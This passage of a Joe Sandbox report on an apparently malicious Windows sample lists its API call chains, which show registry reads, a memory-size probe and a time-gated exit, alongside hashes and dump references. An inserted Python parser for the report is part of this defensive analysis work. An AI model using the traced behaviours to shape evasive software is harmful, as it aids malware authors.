                                  • Part of subcall function 00C9A1C0: std::exception::exception.LIBCMT ref: 00C9A1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C87D76
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C87D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                • String ID: invalid string position$string too long
                                • API String ID: 3310641104-4289949731
                                • Opcode ID: a7e686e7cb8e24ac0b6018fa81c680066170aa6bc8f2a9ac86de70138f9bc544
                                • Instruction ID: 4707ddfa0854a19e1392f4e7a53e7b20632613a11cc328e461ed9a8060df7d6d
                                • Opcode Fuzzy Hash: a7e686e7cb8e24ac0b6018fa81c680066170aa6bc8f2a9ac86de70138f9bc544
                                • Instruction Fuzzy Hash: 2321E4323082009FD724EE2CD880A3AB7E5AFD1759F304B6EE4528B741E770DD0183A9
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C933EF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C933F6
                                • GlobalMemoryStatusEx.KERNEL32 ref: 00C93411
                                • wsprintfA.USER32 ref: 00C93437
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB
                                • API String ID: 2922868504-2651807785
                                • Opcode ID: 266468577edb483355aee1659b3be035a69bc2f6b06c921d12f0c6e0f703f8e7
                                • Instruction ID: 53d614b27b34e04226fe56e328365d41dc70cdff31baa1575a30c38114777ed4
                                • Opcode Fuzzy Hash: 266468577edb483355aee1659b3be035a69bc2f6b06c921d12f0c6e0f703f8e7
                                • Instruction Fuzzy Hash: CA01D871A04258AFDB04DF99DD49B6EB7B8FB45710F004129FA06E7380D774A90086A5
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,0179DED0,00000000,00020119,?), ref: 00C8D7F5
                                • RegQueryValueExA.ADVAPI32(?,0179ED20,00000000,00000000,00000000,000000FF), ref: 00C8D819
                                • RegCloseKey.ADVAPI32(?), ref: 00C8D823
                                • lstrcat.KERNEL32(?,00000000), ref: 00C8D848
                                • lstrcat.KERNEL32(?,0179EE70), ref: 00C8D85C
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: 4be8bf61aaccce7efc4f396548407752f4f7149e0527a2aea987cdd59911cbb6
                                • Instruction ID: 063c1be19482d680b2709329540c8fa53d1d78459aa3e18a8e30bac7cdee49d9
                                • Opcode Fuzzy Hash: 4be8bf61aaccce7efc4f396548407752f4f7149e0527a2aea987cdd59911cbb6
                                • Instruction Fuzzy Hash: A7414375A1010C9FCB58EF68EC86EDE77B4AF98304F008065B90DA7251EE30AA499F91
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 00C87F31
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C87F60
                                • StrCmpCA.SHLWAPI(00000000,00CA4C3C), ref: 00C87FA5
                                • StrCmpCA.SHLWAPI(00000000,00CA4C3C), ref: 00C87FD3
                                • StrCmpCA.SHLWAPI(00000000,00CA4C3C), ref: 00C88007
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 96bcc57a5fd2711ddda475d717cede6594985af3ecfa7aca530961279e90df61
                                • Instruction ID: 1bb093a6f299ba349710ae4e1e8a6400f121d9596fb617d539e6daf1b68cfeb7
                                • Opcode Fuzzy Hash: 96bcc57a5fd2711ddda475d717cede6594985af3ecfa7aca530961279e90df61
                                • Instruction Fuzzy Hash: 5141D13050411ADFCB20EF9AC880E9EB7B4FF55344B214198E90ADB351EB70EE65CB91
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 00C880BB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C880EA
                                • StrCmpCA.SHLWAPI(00000000,00CA4C3C), ref: 00C88102
                                • lstrlen.KERNEL32(00000000), ref: 00C88140
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8816F
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: c1032e26560bcc29b84cb4854f6c58a81e3dfe1e4c2da0e6d2e3f78c4bb02cbb
                                • Instruction ID: 77562b04a3fc3145ec6bd8856e7199e38be64031426041e2a265ca4f42a2c634
                                • Opcode Fuzzy Hash: c1032e26560bcc29b84cb4854f6c58a81e3dfe1e4c2da0e6d2e3f78c4bb02cbb
                                • Instruction Fuzzy Hash: 9F419F716001069FCB21EF6DD948BAEBBF4EF45304F15841CA859D7645EF34EA49CB90
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 00C91B72
                                  • Part of subcall function 00C91820: lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C9184F
                                  • Part of subcall function 00C91820: lstrlen.KERNEL32(01786EE0), ref: 00C91860
                                  • Part of subcall function 00C91820: lstrcpy.KERNEL32(00000000,00000000), ref: 00C91887
                                  • Part of subcall function 00C91820: lstrcat.KERNEL32(00000000,00000000), ref: 00C91892
                                  • Part of subcall function 00C91820: lstrcpy.KERNEL32(00000000,00000000), ref: 00C918C1
                                  • Part of subcall function 00C91820: lstrlen.KERNEL32(00CA4FA0), ref: 00C918D3
                                  • Part of subcall function 00C91820: lstrcpy.KERNEL32(00000000,00000000), ref: 00C918F4
                                  • Part of subcall function 00C91820: lstrcat.KERNEL32(00000000,00CA4FA0), ref: 00C91900
                                  • Part of subcall function 00C91820: lstrcpy.KERNEL32(00000000,00000000), ref: 00C9192F
                                • sscanf.NTDLL ref: 00C91B9A
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C91BB6
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C91BC6
                                • ExitProcess.KERNEL32 ref: 00C91BE3
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                • String ID:
                                • API String ID: 3040284667-0
                                • Opcode ID: 726dfc3eb533e19bb6e9fcec1c552818522ed6d561929606bcc503b5d788d82a
                                • Instruction ID: 9b7efe538f80fe8421409cfdb9e8c5d3a4a673a1c37af63b817742197832d065
                                • Opcode Fuzzy Hash: 726dfc3eb533e19bb6e9fcec1c552818522ed6d561929606bcc503b5d788d82a
                                • Instruction Fuzzy Hash: B421E4B1518301AF8750DF69D88585FBBF9EFC9254F408A1EF599D3220E730E6098BA6
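The API blocks above are easier to compare once pulled out of the report text: the GlobalMemoryStatusEx routine that formats "%d MB", the RegOpenKeyExA reader whose operands are hKey 80000001 and samDesired 00020119, and the routine that calls GetSystemTime, then sscanf, then SystemTimeToFileTime twice, then ExitProcess. The Python below is an added example and not code from the Joe Sandbox report or from the analysed sample: it parses the plain-text "APIs" / "Similarity" blocks in the form printed on this page, decodes the registry hive handle and access mask (80000001 is HKEY_CURRENT_USER, 0x20019 is KEY_READ, 0x0100 is KEY_WOW64_64KEY), and tags each block with analyst heuristics. The sample input is constructed from lines copied out of this report; the tag names (registry-read, memory-size-probe, time-gated-exit) are this example's assumptions about what the API chains suggest, not confirmed behaviour of the sample.

```python
"""Parse Joe Sandbox function-analysis text into per-function API records.
Added example: not code from the Joe Sandbox report or the analysed sample.
SAMPLE is constructed from lines copied out of this page."""
import re
from collections import namedtuple
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Matches "GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C933EF", optionally
# prefixed by "Part of subcall function 00C9A1C0: " when the call is nested.
API_RE = re.compile(r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
                    r"(?P<name>[\w:]+)\.(?P<module>[A-Z0-9]+)"
                    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
HIVES = {"80000000": "HKEY_CLASSES_ROOT", "80000001": "HKEY_CURRENT_USER",
         "80000002": "HKEY_LOCAL_MACHINE", "80000003": "HKEY_USERS"}
KEY_READ = 0x20019  # STANDARD_RIGHTS_READ|KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY
KEY_WOW64_64KEY = 0x0100
# Analyst heuristics assumed for this example: a tag fires when the function itself
# calls every API in the set. They name chains seen in this report, not proven logic.
PATTERNS: Dict[str, frozenset] = {
    "registry-read": frozenset({"RegOpenKeyExA", "RegQueryValueExA"}),
    "memory-size-probe": frozenset({"GlobalMemoryStatusEx"}),
    "time-gated-exit": frozenset({"GetSystemTime", "SystemTimeToFileTime", "ExitProcess"})}

ApiCall = namedtuple("ApiCall", "name module args ref caller")  # caller: subcall address or None


@dataclass
class FunctionBlock:
    strings: Tuple[str, ...] = ()
    calls: List[ApiCall] = field(default_factory=list)


def parse_report(text: str) -> List[FunctionBlock]:
    """A block starts at each 'APIs' heading; any other non-bullet line is a heading."""
    blocks: List[FunctionBlock] = []
    section = None
    for line in (l.strip() for l in text.splitlines()):
        if not line.startswith("•"):
            section = line or section  # APIs, Strings, Similarity, ...
            if line == "APIs":
                blocks.append(FunctionBlock())
            continue
        if not blocks:
            continue
        body = line.lstrip("•").strip()
        m = API_RE.match(body) if section == "APIs" else None
        if m:
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            blocks[-1].calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["caller"]))
        elif body.startswith("String ID:"):  # several strings are joined with '$'
            blocks[-1].strings = tuple(s for s in body[10:].strip().split("$") if s)
    return blocks


def direct_sequence(block: FunctionBlock) -> List[str]:
    """APIs the function calls itself, in report order (nested subcalls excluded)."""
    return [c.name for c in block.calls if c.caller is None]


def tag_block(block: FunctionBlock) -> List[str]:
    names = set(direct_sequence(block))
    return sorted(tag for tag, needed in PATTERNS.items() if needed <= names)


def describe_reg_open(call: ApiCall) -> Optional[Tuple[str, str]]:
    """Decode hKey and samDesired of a RegOpenKeyExA call into (hive, access)."""
    if call.name != "RegOpenKeyExA" or len(call.args) < 4:
        return None
    hive = HIVES.get(call.args[0].upper(), call.args[0])
    try:
        sam = int(call.args[3], 16)
    except ValueError:  # the sandbox prints '?' for operands it could not recover
        return hive, call.args[3]
    names = ["KEY_READ"] if sam & KEY_READ == KEY_READ else []
    if sam & KEY_WOW64_64KEY:
        names.append("KEY_WOW64_64KEY")  # 32-bit code asking for the 64-bit registry view
    return hive, "|".join(names) or hex(sam)


SAMPLE = """\
APIs
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C933EF
• RtlAllocateHeap.NTDLL(00000000), ref: 00C933F6
• GlobalMemoryStatusEx.KERNEL32 ref: 00C93411
• wsprintfA.USER32 ref: 00C93437
Similarity
• String ID: %d MB
APIs
• RegOpenKeyExA.ADVAPI32(80000001,0179DED0,00000000,00020119,?), ref: 00C8D7F5
• RegQueryValueExA.ADVAPI32(?,0179ED20,00000000,00000000,00000000,000000FF), ref: 00C8D819
• RegCloseKey.ADVAPI32(?), ref: 00C8D823
APIs
• GetSystemTime.KERNEL32(?), ref: 00C91B72
  • Part of subcall function 00C91820: lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C9184F
• sscanf.NTDLL ref: 00C91B9A
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00C91BB6
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00C91BC6
• ExitProcess.KERNEL32 ref: 00C91BE3
"""

if __name__ == "__main__":
    for b in parse_report(SAMPLE):
        print(direct_sequence(b), b.strings, tag_block(b),
              [describe_reg_open(c) for c in b.calls if c.name == "RegOpenKeyExA"])
```

Run over the full report text instead of SAMPLE, the same parser gives one record per function block, so the direct call order (for instance GetSystemTime before sscanf before ExitProcess) can be checked mechanically rather than by eye, and every RegOpenKeyExA operand pair can be listed with its decoded hive and access mask.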
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C93166
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C9316D
                                • RegOpenKeyExA.ADVAPI32(80000002,0178B7F8,00000000,00020119,?), ref: 00C9318C
                                • RegQueryValueExA.ADVAPI32(?,0179DDF0,00000000,00000000,00000000,000000FF), ref: 00C931A7
                                • RegCloseKey.ADVAPI32(?), ref: 00C931B1
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 5872976ba6b34cd10b056e491f1eed506a10a5bc4eae7db697faf52d5bd8ca74
                                • Instruction ID: cd9f71c8df574f562a913faab61b015e7f3385e80d13486fb35c0e4682ae6bee
                                • Opcode Fuzzy Hash: 5872976ba6b34cd10b056e491f1eed506a10a5bc4eae7db697faf52d5bd8ca74
                                • Instruction Fuzzy Hash: 7F114676A40205AFD710CB95DD45FABB7BCF789711F004119FA05E3640D775690487A1
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: 3f7482f90809d845d8a84343c5096230bab186cbfecba35226f5635faa1f414a
                                • Instruction ID: 545bc3a3914f184932627efdbdaff3fad289e477f669083a2cc5981822a8cfa3
                                • Opcode Fuzzy Hash: 3f7482f90809d845d8a84343c5096230bab186cbfecba35226f5635faa1f414a
                                • Instruction Fuzzy Hash: 9241D57050475C9EDF218B298C8DFFB7BF8EB45304F1444ECE99A86182E2719B459F20
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C78996
                                  • Part of subcall function 00C9A1C0: std::exception::exception.LIBCMT ref: 00C9A1D5
                                  • Part of subcall function 00C9A1C0: std::exception::exception.LIBCMT ref: 00C9A1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C789CD
                                  • Part of subcall function 00C9A173: std::exception::exception.LIBCMT ref: 00C9A188
                                  • Part of subcall function 00C9A173: std::exception::exception.LIBCMT ref: 00C9A1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
